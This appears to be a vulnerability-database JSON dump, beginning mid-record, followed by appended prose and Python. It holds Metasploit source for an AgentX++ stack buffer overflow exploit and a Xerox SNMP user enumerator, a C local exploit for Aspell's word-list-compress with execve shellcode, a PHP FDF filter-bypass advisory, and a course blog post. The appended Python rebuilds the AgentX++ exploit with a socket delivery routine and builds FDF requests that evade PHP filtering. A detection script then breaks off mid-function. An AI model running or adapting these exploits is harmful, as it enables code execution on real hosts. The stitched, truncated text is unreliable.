{}\n\n # Load artifacts from yaml file. 
Artifacts are organized by what they\n # are evidence of.\n yaml = YAML::load_file(datastore['ARTIFACTS'])\n yaml.each_key do |key|\n print_status(\"Searching for artifacts of #{key}\")\n files = yaml[key]['files']\n regs = yaml[key]['reg_entries']\n found = []\n\n # Process file entries\n vprint_status(\"Processing #{files.length.to_s} file entries for #{key}.\")\n\n files.each do |file|\n digest = file_remote_digestmd5(file['name'])\n # if the file doesn't exist then digest will be nil\n next if digest == nil\n if digest == file['csum'] then found << file['name'] end\n end\n\n # Process registry entries\n vprint_status(\"Processing #{regs.length.to_s} registry entries for #{key}.\")\n\n regs.each do |reg|\n rdata = registry_getvaldata(reg['key'], reg['val'])\n if rdata.to_s == reg['data']\n found << reg['key'] + '\\\\' + reg['val']\n end\n end\n\n # Did we find anything? If so store it in the evidence hash to be\n # saved in the loot.\n if found.empty?\n print_status(\"No artifacts of #{key} found.\")\n else\n print_status(\"Artifacts of #{key} found.\")\n evidence[key] = found\n end\n end\n\n save(evidence, \"Enumerated Artifacts\")\n end\n\n def save(data, name)\n str = \"\"\n data.each_pair do |key, val|\n str << \"Evidence of #{key} found.\\n\"\n val.each do |v|\n str << \"\\t\" + v + \"\\n\"\n end\n end\n\n f = store_loot('enumerated.artifacts', 'text/plain', session, str, name)\n print_good(\"#{name} stored in: #{f}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/enum_artifacts.rb"}, {"lastseen": "2019-11-25T17:20:32", "bulletinFamily": "exploit", "description": "This module will do user enumeration based on the Xerox WorkCentre present on the network. 
SNMP is used to extract the usernames.\n", "modified": "2017-07-24T13:26:21", "published": "2011-03-23T16:13:37", "id": "MSF:AUXILIARY/SCANNER/SNMP/XEROX_WORKCENTRE_ENUMUSERS", "href": "", "type": "metasploit", "title": "Xerox WorkCentre User Enumeration (SNMP)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SNMPClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Xerox WorkCentre User Enumeration (SNMP)',\n 'Description' => %q{\n This module will do user enumeration based on the Xerox WorkCentre present on the network.\n SNMP is used to extract the usernames.\n },\n 'Author' =>\n [\n 'pello <fropert[at]packetfault.org>'\n ],\n 'License' => MSF_LICENSE\n )\n end\n\n def run_host(ip)\n begin\n snmp = connect_snmp\n\n if snmp.get_value('sysDescr.0') =~ /Xerox/\n @users = []\n 285222001.upto(285222299) { |oidusernames|\n snmp.walk(\"1.3.6.1.4.1.253.8.51.5.1.1.4.151.#{oidusernames}\") do |row|\n row.each { |val| @users << val.value.to_s if val.value.to_s.length >= 1 }\n end\n }\n print_good(\"#{ip} Found Users: #{@users.uniq.sort.join(\", \")} \")\n\n @users.each do |user|\n report_note(\n :host => rhost,\n :port => datastore['RPORT'],\n :proto => 'udp',\n :sname => 'snmp',\n :update => :unique_data,\n :type => 'xerox.workcenter.user',\n :data => user)\n end\n end\n\n # No need to make noise about timeouts\n rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"#{ip} Error: #{e.class} #{e} #{e.backtrace}\")\n ensure\n disconnect_snmp\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb"}, {"lastseen": "2019-11-29T09:38:19", "bulletinFamily": "exploit", "description": "This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This module was tested successfully against master.exe as included with Real Network\\'s Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This module does not work with NX/XD enabled but could be modified easily to do so. The address\n", "modified": "2017-07-24T13:26:21", "published": "2010-05-05T20:05:39", "id": "MSF:EXPLOIT/WINDOWS/MISC/AGENTXPP_RECEIVE_AGENTX", "href": "", "type": "metasploit", "title": "AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n #include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow',\n 'Description' => %q{\n This exploits a stack buffer overflow in the AgentX++ library, as used by\n various applications. By sending a specially crafted request, an attacker can\n execute arbitrary code, potentially with SYSTEM privileges.\n\n This module was tested successfully against master.exe as included with Real\n Network\\'s Helix Server v12. 
When installed as a service with Helix Server,\n the service runs as SYSTEM, has no recovery action, but will start automatically\n on boot.\n\n This module does not work with NX/XD enabled but could be modified easily to\n do so. The address\n },\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1318' ],\n [ 'OSVDB', '63919'],\n [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867' ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n #'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 1024, # plenty of space\n 'BadChars' => \"\", # none!\n 'DisableNops' => true,\n 'PrependEncoder' => \"\\x81\\xc4\\xf0\\xef\\xff\\xff\"\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Helix Server v12 and v13 - master.exe',\n {\n # The BufAddr varies :-/\n #'BufAddr' => 0xea3800,\n 'BufAddr' => 0x1053880,\n 'BufSize' => 25000, # If this is too large, the buf is unmapped on free\n 'Ret' => 0x46664b, # mov esp,ebp / pop ebp / ret in master.exe\n 'JmpEsp' => 0x7c3d55b7 # jmp esp from bundled msvcp71.dll\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 16 2010'))\n\n register_options([Opt::RPORT(705)])\n end\n\n def exploit\n print_status(\"Trying target #{target.name}...\")\n\n connect\n print_status(\"Triggering the vulnerability... 
Cross your fingers!\")\n\n num = target['BufSize']\n num_str = [num].pack('N')\n\n # First send 19 bytes to almost fill the buffer...\n hdr = ''\n hdr << [0x01, rand(256), 0x10 | rand(256), rand(256)].pack('CCCC')\n hdr << rand_text(16 - hdr.length)\n #hdr << \"QQQQRRRRSSSS\"\n hdr << num_str[0,3]\n sock.put(hdr)\n\n # Wait to make sure it processed that chunk.\n select(nil, nil, nil, 0.5)\n #print_status(\"press enter to trigger...\"); x = $stdin.gets\n\n # Send the rest (smashed!)\n hdr = ''\n hdr << num_str[3,1]\n\n # NOTE: this stuff is extra, but doesn't count towards the payload..\n hdr << rand_text(8)\n #hdr << \"EEEEFFFF\"\n\n # becomes ebp\n #hdr << \"\\xeb\" * 4\n base = target['BufAddr']\n new_ebp = base + (num / 2)\n if (mod4 = (num % 4)) > 0\n # align to 4 bytes\n new_ebp += (4 - mod4)\n end\n hdr << [new_ebp].pack('V')\n\n # becomes eip\n #hdr << \"\\xef\\xbe\\xad\\xde\"\n hdr << [target.ret].pack('V')\n\n # NOTE: sending more data will smash the low (up to 3) bytes of the socket handle -- no fun\n sock.put(hdr)\n\n # Send the data that we said we would...\n stack = []\n stack << target['JmpEsp']\n\n num_rets = (num - payload.encoded.length - 4) / 4\n num_rets.times {\n # points to ret instruction\n stack.unshift(target.ret + 3)\n }\n\n stack = stack.pack('V*')\n stack << payload.encoded\n # make sure we have all the bytes, or we wont reach the path we want.\n stack << rand_text(num - stack.length)\n\n sock.put(stack)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/agentxpp_receive_agentx.rb"}], "avleonov": [{"lastseen": "2019-05-29T14:19:28", "bulletinFamily": "blog", "description": "In the last three weeks, I participated in [Tinkoff Fintech School](<https://fintech.tinkoff.ru/tfschool/about>) - educational program for university students. 
Together with my colleagues, we prepared a three-month [practical Information Security course](<https://fintech.tinkoff.ru/tfschool/infsec>): 1 lecture per week with tests and home tasks. \n\nEach lecture is given by a member of our security team, specialized in one of the following modules: **Vulnerability Management**, Application Security, Infrastructure Security, Network Security, Virtualization Security, Banking Systems Security, Blue & Red-teaming, etc.\n\n[](<https://avleonov.com/wp-content/uploads/2019/03/vm_fintech.png>)\n\nThe course is still ongoing, but my Vulnerability Management module is over. Therefore, I want to share my impressions and some statistics.\n\n### Lecture\n\nThe content was pretty much the same as for [my lecture at MIPT ](<https://avleonov.com/2018/12/29/mipt-phystech-guest-lecture-vulnerabilities-money-and-people/>)in December last year. I removed some boring slides about Vulnerability Databases, added some [more critics of Vulnerability Management products](<https://avleonov.com/2018/12/21/guinea-pig-and-vulnerability-management-products/>), their [reports](<https://avleonov.com/2019/01/12/whats-wrong-with-patch-based-vulnerability-management-checks/>) and [detection methods](<https://avleonov.com/2019/02/11/no-left-boundary-for-vulnerability-detection/>). And I also updated information about [open vacancies](<https://avleonov.com/2019/02/04/open-positioner-my-new-project-for-tracking-it-and-security-jobs/>) related to Vulnerability Management.\n\n### Testing\n\nIn the beginning of each lecture, students should solve some tests based on the materials of the previous lecture. Basically it is for motivating them to visit lectures. \n\nI always wondered why Information Security tests are always so weird. They either check the knowledge of some terms or definitions invented by some nonames or the knowledge of reference data, the markings of fire extinguishers in the CISSP exam, for example. 
Or it is a fascinating game: guess the logic of the individual who wrote the question. Anyway, it's far from real life and real practice. \n\nWell, I thought so until I had to make my own questions. It turned out that it's pretty hard to make them unambiguous, reasonable and not based on subjective experience. As a result, the questions were about the Vulnerability Management process, [Vulnerability life cycle](<https://avleonov.com/2019/01/30/vulnerability-life-cycle-and-vulnerability-disclosures/>), [basic vulnerability types](<https://avleonov.com/2018/11/29/making-vulnerable-web-applications-xxs-rce-sql-injection-and-stored-xss-buffer-overflow/>), and Vulnerability Detection issues. All of this was covered in the lecture. Many students answered all the questions correctly, so it seems to me that the test wasn't bad.\n\n### Homework\n\nAnd the most interesting and intriguing part was the homework. There were 2 tasks and the deadline was two weeks. \n\n#### Task 1. Vulnerability Detection and Exploitation\n\n_Deploy virtual machines in your home environment:_\n\n 1. _Vulnerable Target host (for example, Metasploitable or an old version of Windows/Linux)_\n 2. _Vulnerability Scanner (for example, Nessus Home, OpenVAS, Nexpose Community)_\n 3. _Exploitation Tool (for example, Metasploit or some separate exploits)_\n\n_Run a vulnerable service on the Vulnerable Target host (for example, SSH), detect the vulnerability with the Vulnerability Scanner, exploit it and get remote access to the host. Write a report on how you did it step by step and explain each of your choices. 
_\n\n_Bonus: write your own detection script for the exploited vulnerability._\n\nIn this task I wanted the students to see \n\n * how a vulnerability can be detected and exploited;\n * that a Vulnerability Scanner is not some magical tool and they can make a small scanner on their own.\n\nThe task was intentionally formulated very broadly, without mentioning actual tools and vulnerabilities, because I was curious what exactly they would choose. So, those who are not really interested in the topic could choose something easy, and those who like this stuff could use the task to do some interesting research. \n\nMost of the students chose Metasploitable as the vulnerable target host. Actually, this is the easiest way. But, as you can see, some students chose ordinary operating systems: Windows, Ubuntu Linux and docker containers.\n\nThe same number of students used [Nessus Home](<https://avleonov.com/2016/05/16/tenable-nessus-registration-installation-scanning-reporting/>) and OpenVAS for vulnerability detection. They registered Nessus Home on their own and used it in their home environment, so the license agreement was not violated.\n\nIn most cases students used Metasploit for exploitation. But sometimes it was a custom Python script or just curl.\n\nThey exploited very different vulnerabilities: \n\n 1. BID:48539 - vsftpd Compromised Source Packages Backdoor Vulnerability \n 2. CVE-2004-2687 - DistCC Daemon Command Execution \n 3. CVE-2007-2447 - Samba \"username map script\" Command Execution\n 4. CVE-2008-0166 - Predictable PRNG Brute Force SSH\n 5. CVE-2010-2075 - UnrealIRCD 3.2.8.1 Backdoor Command Execution\n 6. CVE-2015-1427 - Elasticsearch Search Groovy Sandbox Bypass\n 7. **CVE-2017-12617 - Apache Tomcat JSP Upload Bypass / Remote Code Execution**\n 8. CVE-2017-9462 - Mercurial Custom hg-ssh Wrapper Remote Code Exec\n 9. **CVE-2019-0724 - Microsoft Exchange Server Remote Privilege Escalation Vulnerability**\n 10. 
Distributed Ruby - Distributed Ruby Remote Code Execution\n 11. MS08-067 - Vulnerability in Server Service Could Allow Remote Code Execution\n 12. **MS17-010 - Remote code execution in Microsoft Server Message Block 1.0 (SMBv1) server (EternalBlue)**\n 13. ssh bruteforce - brute-force guess SSH login credentials\n\nI liked most the exploitation of the Apache Tomcat RCE (in a docker image), [classical MS17-010](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>) and the new [Microsoft Exchange Server issue](<https://www.tenable.com/blog/proof-of-concept-code-gives-standard-microsoft-exchange-users-domain-administrator-privileges>), because these are the most practical cases. Brute-forcing SSH logins and passwords was not the kind of exploitation expected in this task, but why not, this also happens often. \n\nAnd finally the detection scripts. Most of them were unauthenticated and version-based, written in Python or bash.\n\n#### Task 2. Vulnerability Scoring\n\n_Find a new CVE vulnerability without a CVSS vector on _[_nvd.nist.gov_](<https://nvd.nist.gov/>)_ (\"UNDERGOING ANALYSIS\" state) and make a CVSS v3 Base and Temporal Vector for it. Justify your choice. It is advisable to submit the task before the vector is published on the NVD website._\n\nIn this task I wanted students to see how the criticality of a vulnerability (the one the Vulnerability Scanner shows) is actually produced. The vector itself did not really matter. In fact, it was possible to get the Base Vector from the original vulnerability research. The important part was the justification, like \"I chose Attack Vector (AV): Network because\u2026\", just to show that this is not a random choice. \n\nAs you can see, very few people chose the same vulnerability, which is definitely a good sign:\n\nIt also might be interesting to compare the vector they produced in this task with the vector from the NVD. 
Most likely there will be differences, because CVSS scoring is fairly subjective. \n\n### In conclusion\n\nThis was the second time I gave a lecture and the first time I made additional educational content: tests and homework. It was very cool and exciting. I hope the students had fun too. \n\nThis was only the first module, there is still a lot of content and interesting practical tasks from my colleagues. I hope that all the students will successfully go through all the stages and that with some of them we will meet at work or on an internship.\n\n", "modified": "2019-03-04T10:38:31", "published": "2019-03-04T10:38:31", "id": "AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F", "href": "http://feedproxy.google.com/~r/avleonov/~3/VfGsxXaJTBs/", "type": "avleonov", "title": "Vulnerability Management at Tinkoff Fintech School", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "\r\nSummary\r\n\r\nSince PHP 5.2.0 there is a new filtering extension in PHP that is on the one hand supposed to be used by applications to filter user input and on the other hand able to enforce site wide filtering.\r\n\r\nHowever, due to its broken design it is possible to sneak POST data through the site wide filter when PHP is compiled with FDF support.\r\nAffected versions\r\n\r\nAffected is PHP <= 5.2.0\r\nDetailed information\r\n\r\nWith PHP 5 a number of input filtering hooks were added to PHP that were only used by Yahoo until the Hardened-PHP Project put some work into them and fixed some obvious bugs. From that day the Hardened-PHP Patch came with a varfilter extension that made use of these hooks to filter user input by variable count, size and shape.\r\n\r\nThen the PHP developers developed ext/filter, which was supposed to be bundled with PHP, and broke the input filtering system. 
Because ext/filter takes over the input filtering system and does not give control back to previously defined input filters, the new input filtering hooks are dead. The PHP developers knew that Hardened-PHP used these hooks, but that did not stop them from intentionally breaking it.\r\n\r\nThe input filtering hooks are designed in a way that at all places where user input is parsed and registered as variables a call to the input filter is added that decides what to do with the variables. The problem with this is that all extensions that add support for other POST content-types also need to implement the hooks, otherwise the data passes through unfiltered.\r\n\r\nWith ext/fdf PHP ships an extension that adds the FDF POST data format but does not call the input filtering. Therefore it is possible to bypass all site wide enforced filters.\r\nProof of concept, exploit or instructions to reproduce\r\n\r\nAttached is an exploit that converts the _POST array into POST data in the application/vnd.fdf format and POSTs it to a URL, bypassing the site wide filter enforced by ext/filter.\r\nNotes\r\n\r\nPHP's new filtering extension is the next misdesigned feature of PHP that will most probably cause a lot of headaches to developers and especially admins.\r\n\r\nFirst of all the filtering hooks are at the wrong place, so that again the filtering will only take place when all loaded extensions (including 3rd party ones) that deal with user input add calls to the filtering hooks.\r\n\r\nAnd secondly ext/filter is written in a way that other people's filtering extensions will not work anymore, because ext/filter grabs the filtering hooks and does not perform daisy chaining. The PHP developers intentionally broke the varfilter extension of Hardened-PHP with this. 
However Suhosin, which should be used instead of HPHP anyway, does work with ext/filter.\r\n\r\nAnd last but not least, ext/filter is of course only an optional extension that can be disabled by the admin at any time, and therefore any PHP application that relies on it for input filtering will only work if the input filtering extension is installed.\r\n", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:DOC:16320", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16320", "title": "MOPB-17-2007:PHP ext/filter FDF Post Bypass Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "FDF extension doesn't support filtering.", "modified": "2007-03-10T00:00:00", "published": "2007-03-10T00:00:00", "id": "SECURITYVULNS:VULN:7376", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7376", "title": "PHP FDF POST request filtering protection bypass", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-27T01:27:02", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2004-12-01T00:00:00", "published": "2004-12-01T00:00:00", "id": "1337DAY-ID-7376", "href": "https://0day.today/exploit/description/7376", "type": "zdt", "title": "Aspell (word-list-compress) Command Line Stack Overflow", "sourceData": "=======================================================\r\nAspell (word-list-compress) Command Line Stack Overflow\r\n=======================================================\r\n\r\n\r\n/*\r\n Fuck private exploits .\r\n Fuck iranian hacking (and security !!) teams who are just some fucking kiddies.\r\n Fuck all \"Security money makers\"\r\n \r\n word-list-compress local exploit - SECU\r\n Coded by : c0d3r / root . razavi1366[at]yahoo[dot]com\r\n word-list-compress is not setuid . 
so good for backdooring .\r\n gratz fly to : LorD - NT - sIiiS - vbehzadan - hyper sec members.\r\n we are : LorD - c0d3r - NT ; irc.persiairc.com 6667 #ihs\r\n*/\r\n\r\n#include<stdio.h>\r\n#include<stdlib.h>\r\n#define NOP 0x90\r\n#define address 0xbffff2b8\r\n#define size 350\r\nunsigned long get_sp(void)\r\n{\r\n __asm__(\"movl %esp, %eax\");\r\n}\r\nint main()\r\n{\r\nchar shellcode[] = /* 37 bytes shellcode written by myself */\r\n\"\\xeb\\x16\\x5b\\x31\\xc0\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\"\r\n\"\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\\x53\\x0c\\xcd\\x80\\xe8\\xe5\\xff\\xff\"\r\n\"\\xff/bin/sh\";\r\nchar exploit[size] ;\r\nchar *ptr;\r\nlong *addr_ptr;\r\nchar test[300];\r\nlong addr;\r\nint NL= 180 ;\r\n\r\nint i ;\r\nint x=0 ;\r\nptr = exploit;\r\naddr_ptr = (long *) ptr;\r\n\r\nfor(i=0;i < size;i+=4){\r\n*(addr_ptr++) = address;\r\n}\r\nfor(i=0 ; i < NL ; i++ )\r\n{\r\nexploit[i] = NOP;\r\n}\r\nif(shellcode != NULL){\r\nwhile(x != strlen(shellcode)){\r\nexploit[NL] = shellcode[x];\r\nNL+=1;x+=1;\r\n}\r\n\r\n }\r\nexploit[size] = 0x00;\r\n\r\nprintf(\"word-list-compress local exploit by root / c0d3r\\n\");\r\nprintf(\"stack pointer: 0x%x\\n\", get_sp());\r\nprintf(\"using return address : 0x%x\\n\", address);\r\nprintf(\"using %d bytes shellcode\\n\", sizeof(shellcode));\r\nsetenv(\"exploit\", exploit, 1);\r\nputenv(exploit);\r\nprintf(\"exploit string loaded into the enviroment\\n\");\r\nsystem(\"echo $exploit | word-list-compress c\");\r\nreturn 0;\r\n}\r\n\r\n/*\r\n\r\n[email\u00a0protected]:/sploits# word-list-compress\r\nCompresses or uncompresses sorted word lists.\r\nFor best result the locale should be set to C\r\nbefore sorting by setting the environmental\r\nvariable LANG to \"C\" before sorting.\r\nCopyright 2001 by Kevin Atkinson.\r\nUsage: word-list-compress c[ompress]|d[ecompress]\r\n[email\u00a0protected]:/sploits#\r\n\r\n************************************************************\r\n\r\n[email\u00a0protected]:/sploits# echo `perl -e 
'print \"A\"x300'` |\r\nword-list-compress c\r\nSegmentation fault (core dumped)\r\n[email\u00a0protected]:/sploits# gdb -c core\r\nGNU gdb 6.1.1\r\nCopyright 2004 Free Software Foundation, Inc.\r\nGDB is free software, covered by the GNU General Public License, and you are\r\nwelcome to change it and/or distribute copies of it under certain\r\nconditions.\r\nType \"show copying\" to see the conditions.\r\nThere is absolutely no warranty for GDB. Type \"show warranty\" for details.\r\nThis GDB was configured as \"i486-slackware-linux\".\r\nCore was generated by `word-list-compress c'.\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x41414141 in ?? ()\r\n(gdb) info registers\r\neax 0x0 0\r\necx 0x40154c20 1075137568\r\nedx 0x0 0\r\nebx 0x41414141 1094795585\r\nesp 0xbffff560 0xbffff560\r\nebp 0x41414141 0x41414141\r\nesi 0x41414141 1094795585\r\nedi 0x41414141 1094795585\r\neip 0x41414141 0x41414141\r\neflags 0x210246 2163270\r\ncs 0x23 35\r\nss 0x2b 43\r\nds 0x2b 43\r\nes 0x2b 43\r\nfs 0x2b 43\r\n---Type <return> to continue, or q <return> to quit---\r\n\r\n**********************************************************\r\n\r\n[email\u00a0protected]:/sploits# gcc word-list-compress.c -o word-list-compress\r\nword-list-compress.c:65:2: warning: no newline at end of file\r\n[email\u00a0protected]:/sploits# ./word-list-compress\r\nword-list-compress local exploit by root / c0d3r\r\nstack pointer: 0xbffff268\r\nusing return address : 0xbffff2b8\r\nusing 37 bytes shellcode\r\nexploit string loaded into the enviroment\r\n [1 C[C KS /bin/sh sh-2.05b# echo IHS\r\nIHS\r\nsh-2.05b#\r\n\r\n************************************************************\r\n\r\nthats all . have fun !\r\n*/\r\n\r\n\r\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7376"}]}
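The AgentX++ module above (agentxpp_receive_agentx) is easier to read once the three socket writes are laid out separately: 19 header bytes carrying three of the four big-endian length bytes, a 17-byte second write that supplies the last length byte plus the values that become EBP and EIP, and then exactly the announced number of body bytes holding a sled of pointers to a ret instruction, one jmp esp and the payload. The following is an added example, not code from the Metasploit module; it rebuilds the same layout in plain Python using the constants from the module's Helix Server target entry, with a constructed placeholder in place of payload.encoded and os.urandom in place of rand_text. The deliver function is an assumption about how one would replay the writes; the module itself does this through sock.put with a half-second select after the first write.

```python
import os
import socket
import struct
import time

# Constants copied from the module's target table for Helix Server v12/v13 master.exe.
BUF_ADDR = 0x1053880  # receive buffer address (the module notes it varies between runs)
BUF_SIZE = 25000      # announced PDU length; too large and the buffer is unmapped on free
RET = 0x46664b        # mov esp,ebp / pop ebp / ret in master.exe
JMP_ESP = 0x7c3d55b7  # jmp esp in the bundled msvcp71.dll
# Stack adjustment the module prepends to the encoded payload ('PrependEncoder'): add esp, -0x1010
PREPEND_ENCODER = b"\x81\xc4\xf0\xef\xff\xff"

# Constructed stand-in for payload.encoded (eight int3 instructions), illustration only.
PLACEHOLDER_PAYLOAD = b"\xcc" * 8


def aligned_new_ebp(buf_addr, num):
    """Mirror the module's EBP computation: middle of the buffer, rounded up to 4 bytes."""
    new_ebp = buf_addr + num // 2
    mod4 = num % 4
    if mod4:
        new_ebp += 4 - mod4
    return new_ebp


def build_sends(payload, buf_addr=BUF_ADDR, num=BUF_SIZE, ret=RET, jmp_esp=JMP_ESP):
    """Return the three writes the module performs, in order, as bytes.

    The AgentX header ends with a 32-bit big-endian payload length.  The module
    splits that field across two writes so that the first 19 bytes almost fill
    the receive buffer before the second write lands on saved EBP and EIP.
    """
    num_str = struct.pack(">I", num)

    # Write 1 (19 bytes): version 1, random type, flags with 0x10 set, random
    # reserved byte, 12 random filler bytes, then the first 3 length bytes.
    hdr1 = bytes([0x01, os.urandom(1)[0], 0x10 | os.urandom(1)[0], os.urandom(1)[0]])
    hdr1 += os.urandom(16 - len(hdr1))
    hdr1 += num_str[:3]

    # Write 2 (17 bytes): last length byte, 8 bytes that sit below the saved
    # frame, then the values that become EBP and EIP.  The module warns that
    # sending more here would smash the socket handle stored right after them.
    hdr2 = num_str[3:4] + os.urandom(8)
    hdr2 += struct.pack("<I", aligned_new_ebp(buf_addr, num))
    hdr2 += struct.pack("<I", ret)

    # Write 3 (exactly num bytes, as announced): a sled of pointers to the
    # 'ret' instruction (ret + 3), one jmp esp, the payload, random padding.
    encoded = PREPEND_ENCODER + payload
    num_rets = (num - len(encoded) - 4) // 4
    body = struct.pack("<I", ret + 3) * num_rets
    body += struct.pack("<I", jmp_esp)
    body += encoded
    body += os.urandom(num - len(body))
    return hdr1, hdr2, body


def layout(payload, num=BUF_SIZE):
    """Offsets inside write 3, useful when checking the sled/jmp/payload boundaries in a debugger."""
    encoded = PREPEND_ENCODER + payload
    num_rets = (num - len(encoded) - 4) // 4
    payload_at = num_rets * 4 + 4
    return {
        "sled_bytes": num_rets * 4,
        "jmp_esp_at": num_rets * 4,
        "payload_at": payload_at,
        "pad_bytes": num - (payload_at + len(encoded)),
    }


def deliver(host, port, sends, pause=0.5):
    """Replay the three writes with the module's half-second wait after the first one (assumed helper)."""
    with socket.create_connection((host, port)) as s:
        s.sendall(sends[0])
        time.sleep(pause)  # let the target consume the first chunk before the overwrite lands
        s.sendall(sends[1])
        s.sendall(sends[2])
```

The check worth doing before pointing this at anything is that write 3 is exactly BUF_SIZE bytes: the module comments that a short body never reaches the code path that returns through the smashed frame, and an over-long one changes where the buffer is freed.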
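The MOPB-17-2007 advisory above says the attached exploit converts the _POST array into application/vnd.fdf and posts it, so that ext/fdf registers the variables without ext/filter's site-wide filter ever running. That exploit is not reproduced on this page. What follows is an added example, not the advisory's code: it shows the encoding step, a minimal FDF document with one /T (name) /V (value) entry per field and a raw HTTP request around it, in Python. It assumes that the fdf POST handler reads the /Fields array under /FDF and registers each /T as a variable named after it, which is how the FDF toolkit exposes form data; the host, path and the sample field are constructed for illustration. The escaping in pdf_string matters: parentheses and backslashes inside a PDF literal string must be escaped or the document is truncated at the first stray ")".

```python
def pdf_string(value):
    """Encode a Python str as a PDF literal string.

    Backslash, '(' and ')' are escaped; bytes outside printable ASCII are
    written as \\ooo octal escapes so the document stays 7-bit clean.
    """
    out = []
    for b in value.encode("utf-8"):
        if b in (0x5C, 0x28, 0x29):  # backslash, ( , )
            out.append("\\" + chr(b))
        elif 0x20 <= b < 0x7F:
            out.append(chr(b))
        else:
            out.append("\\%03o" % b)
    return "(" + "".join(out) + ")"


def fdf_body(fields):
    """Serialize a {name: value} mapping as an FDF document (the application/vnd.fdf payload)."""
    entries = "".join(
        "<< /T %s /V %s >>\n" % (pdf_string(name), pdf_string(value))
        for name, value in fields.items()
    )
    return (
        "%FDF-1.2\n"
        "1 0 obj\n"
        "<< /FDF << /Fields [\n" + entries + "] >> >>\n"
        "endobj\n"
        "trailer\n"
        "<< /Root 1 0 R >>\n"
        "%%EOF\n"
    )


def build_request(host, path, fields):
    """Wrap the FDF document in a raw HTTP/1.1 POST with the content type ext/fdf handles."""
    body = fdf_body(fields).encode("utf-8")
    head = (
        "POST %s HTTP/1.1\r\n"
        "Host: %s\r\n"
        "Content-Type: application/vnd.fdf\r\n"
        "Content-Length: %d\r\n"
        "Connection: close\r\n"
        "\r\n" % (path, host, len(body))
    ).encode("ascii")
    return head + body


# Constructed sample: a value that a site-wide FILTER_SANITIZE_STRING default would
# otherwise strip tags from, carried in a field name of the form the filter never sees.
SAMPLE_FIELDS = {"comment": "<script>alert(1)</script>", "name": "O'Brien (test)"}
SAMPLE_REQUEST = build_request("app.example", "/guestbook.php", SAMPLE_FIELDS)
```

The defensive reading of the advisory is the last paragraph of its notes: a site-wide filter.default is only as complete as the set of POST handlers that call the filter hooks, so an application has to validate in its own code regardless of what ext/filter is configured to do globally.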
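The bonus part of Task 1 in the same post asks for a hand-written detection script, and the author reports that most submissions were unauthenticated and version-based. The block below is an added example of that style of check, not any student's script or the post's own code: a small banner-matching scanner for three of the issues on the post's list, BID:48539 (vsftpd 2.3.4 backdoor), CVE-2010-2075 (UnrealIRCd 3.2.8.1 backdoor) and CVE-2007-2447 (Samba "username map script", affecting 3.0.0 through 3.0.25rc3). The banner strings are constructed samples of what those services send; the version-range helper treats an rc build as older than the corresponding final release so the Samba upper bound is handled correctly. The caveat a practitioner wants is built into the design: a version match is evidence, not proof, because distributions backport fixes without changing version strings and the two backdoors only exist in the tampered tarballs, so the result should be reported as "version matches advisory", which is what a scanner's version-based plugin really means.

```python
import re


def parse_version(s):
    """'3.0.25rc3' -> ((3, 0, 25), 0, 3); '3.0.25' -> ((3, 0, 25), 1, 0).

    The middle element orders release candidates before the final build with
    the same numbers, so tuple comparison gives the right answer for ranges
    that end at an rc (as CVE-2007-2447's does).
    """
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(?:rc(\d+))?", s)
    if not m:
        raise ValueError("unparseable version: %r" % s)
    nums = tuple(int(x) for x in m.group(1).split("."))
    if m.group(2) is None:
        return (nums, 1, 0)
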